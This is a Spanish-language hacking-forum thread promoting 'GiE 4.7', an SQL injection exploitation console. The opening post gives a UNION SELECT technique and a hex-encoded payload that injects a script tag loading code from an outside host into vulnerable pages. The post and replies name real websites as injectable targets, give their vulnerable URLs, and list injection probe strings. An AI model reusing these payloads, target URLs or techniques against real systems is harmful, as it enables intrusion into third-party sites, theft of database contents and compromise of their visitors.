Autor
|
Tema: GiE 4.7 - MySQLi (Leído 8,847 veces)
|
Pony-Magic
Desconectado
Mensajes: 36
|
GiE 4.7 No voy a escribir una descripción de que es la GiE, las nuevas características, etc, etc. Simplemente voy a dejar el link de la VERSION 3.0 para el que quiera saber "que es". De esta nueva version solo voy a poner algunos screens, links con ejemplos, el código de fuente y el código para insertarlo en cualquier SQLi. - Screens:
explorador de bases de datos.lector de archivos, con Bruteforce.consola de peticiones, en la imagen un ejemplo de una query que busca mails en la base de datos.variables del servidorHistorial de Inyecciones, para el que quiera saber un poco mas sobre el funcionamiento de la GIE
- Ejemplos:
SQLi GIE [adegasgalegas.es] SQLi GIE [rubias19.com] SQLi GIE [comic-ar.com]
- Usarlo en cualqueir SQLi:
En una SQLi, unis otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 ) En un valor que printee (que se muestre en la web), simplemente copias y pegas el codigo de la GIE.
(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)
|
|
« Última modificación: 16 Marzo 2010, 19:04 pm por Pony-Magic »
|
En línea
|
|
|
|
tragantras
Desconectado
Mensajes: 465
|
como ya dije en DDR cada dia te superas^^
(aqui no se pueden dar puntos que si no... xD )
|
|
|
En línea
|
|
|
|
alexkof158
Desconectado
Mensajes: 415
LOL
|
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo, probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ... Saludos Edito... Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico saludos
|
|
« Última modificación: 16 Marzo 2010, 23:57 pm por alexkof158 »
|
En línea
|
|
|
|
Shell Root
|
... hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico Estás en las iSQL sin saber como es la identificación de sitios vulnerables?
|
|
|
En línea
|
Te vendería mi talento por poder dormir tranquilo.
|
|
|
tragantras
Desconectado
Mensajes: 465
|
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo, probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ... Saludos Edito... Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico saludos http://www.rubias19.com/elnoticiario/videos/index.php?id='POr cierto ponymagic qué sentido tiene difuminar en todas las fotos la parte de la URL si te dejas una sin difuminar? jajaja fail xD
|
|
|
En línea
|
|
|
|
alexkof158
Desconectado
Mensajes: 415
LOL
|
jodaaa ahora se hace mas facil el proceso de las inyecciones buen trabajo, probe algunas cosita pero no pude cancelar una peticion que hice con le bruteforce ... Saludos Edito... Ponyc una preguntica casual como hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico saludos http://www.rubias19.com/elnoticiario/videos/index.php?id='POr cierto ponymagic qué sentido tiene difuminar en todas las fotos la parte de la URL si te dejas una sin difuminar? jajaja fail xD aclare http://comic-ar.com/entrada.php?Id=saludos
|
|
|
En línea
|
|
|
|
alexkof158
Desconectado
Mensajes: 415
LOL
|
... hicistes para saber que la pagina comic.ar era vulnerable a Injection sql o el que la sepa que tire el datico Estás en las iSQL sin saber como es la identificación de sitios vulnerables? joder, obviamente que si se 1 and 1=1-- or 1 and 1=0-- o comillas simples y que tire error sql o algo asi ... pero con comic.ar ninguna de estas funciona...ahora si entiendennn o me explico federicooo
|
|
|
En línea
|
|
|
|
Pony-Magic
Desconectado
Mensajes: 36
|
1) Disfumine por si Murder se quejaba, asi solamente quitaba las SQLi. ( Murder: el admin de diosdelared ) 2) http://comic-ar.com/entrada.php?Id=86'3) Agradeceria que comenten algo sobre el post en vez de discutir como diferenciar un modulo vulnerable a SQLi.
|
|
|
En línea
|
|
|
|
WHK
|
hola, está super bueno, me gustó.
|
|
|
En línea
|
|
|
|
laideker
Desconectado
Mensajes: 68
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
|
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
mysqli
Desarrollo Web
|
tecasoft
|
2
|
2,470
|
24 Noviembre 2012, 20:47 pm
por tecasoft
|
|
|
¿Crear vistas temporales en php+mysqli ?
PHP
|
Psyke1
|
0
|
1,841
|
21 Febrero 2013, 22:02 pm
por Psyke1
|
|
|
API MySQLi
PHP
|
:ohk<any>
|
0
|
2,186
|
12 Noviembre 2013, 21:22 pm
por :ohk<any>
|
|
|
Error en PHP+MySqli
PHP
|
spysecurityca
|
6
|
3,237
|
7 Mayo 2014, 04:52 am
por spysecurityca
|
|
|
mysqli error
Bases de Datos
|
jalbtercero
|
1
|
2,634
|
6 Marzo 2016, 00:52 am
por jalbtercero
|
|